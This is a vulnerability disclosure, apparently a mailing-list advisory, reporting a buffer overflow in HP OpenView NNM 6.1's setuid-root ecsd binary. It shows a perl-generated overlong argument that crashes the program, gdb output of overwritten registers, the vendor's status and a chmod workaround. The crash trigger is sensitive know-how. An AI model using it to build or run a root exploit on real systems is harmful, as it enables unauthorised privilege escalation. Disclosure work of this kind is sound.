HP OpenView NNM v6.1 buffer overflow

[Jonas Eriksson <je () sekure net>]

HP OpenView NNM v6.1 buffer overflow


The problem..

HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd 
located in the /opt/OV/bin/ directory.

ecsd is not used in NNM, but is shipped and installed suid-root as default.


Details..

je@openview~> uname -a
SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
je@openview~> ls -la /opt/OV/bin/ecsd
-r-sr-xr-x   1 root     bin    2953640 maj 18 11:20 /opt/OV/bin/ecsd
je@openview~> pwd
/
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
Failed to restore engine
configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
Segmentation fault (core dumped)
je@openview~> gdb /opt/OV/bin/ecsd --core=core
[snip..]
Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
[snip..]
#0  0x28eb8 in main ()
(gdb) inf reg        
[snip..]
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41410028       1094778920
[snip..]
(gdb)


Vendor Status..

Hewlett-Packard has been contacted. They are currently working on patches
for this vulnerability.                                        


Workaround..

chmod -s /opt/OV/bin/ecsd  
This will remove the setuid bit from /opt/OV/bin/ecsd, therefore if
someone does exploit this vulnerability, they won't gain higher privileges.


Regards
Jonas Eriksson